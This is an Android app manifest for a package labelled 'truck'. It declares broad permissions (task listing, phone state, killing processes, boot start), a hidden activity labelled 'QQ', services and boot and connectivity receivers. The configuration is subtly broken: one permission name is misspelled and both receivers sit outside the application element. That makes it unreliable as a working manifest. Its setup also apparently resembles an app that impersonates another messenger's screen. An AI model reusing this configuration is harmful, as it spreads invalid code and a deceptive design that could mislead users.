<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.mycompany.myapp2"
    android:versionCode="1"
    android:versionName="1.0" >

  <uses-sdk 
        android:minSdkVersion="8" 
        android:targetSdkVersion="11" />
  <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
  <uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS" />
  <uses-permission android:name="android.permisstion.WRITE_EXTERNAL_STORAGE" />
  <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RESTART_PACKAGE" />
  <uses-permission android:name="android.permission.GET_TASKS"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.KILL_BACKGROUND_PROCESSES"/>
    <application
        android:icon="@drawable/ic_launcher"
        android:label="truck" >
        <activity
            android:screenOrientation="portrait"
            android:name=".MainActivity" >
            <intent-filter >
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
		<activity 
			android:label="QQ"
			android:launchMode="singleInstance" 
			android:screenOrientation="portrait" 
			android:name=".MActivity" 
			android:excludeFromRecents="true"/>
		<service android:name="MService"/>
        <service android:name="ManageService"/>
    </application>
	<receiver
		android:name=".BootReceiver">
		<intent-filter>
			<action android:name="android.intent.action.BOOT_COMPLETED" />
		</intent-filter>
	</receiver>
   <receiver
	   android:name=".MReceiver">
   <intent-filter>
	   <action android:name="android.net.conn.CONNECTIVITY_CHANGE" />
   </intent-filter>
   </receiver>
</manifest>
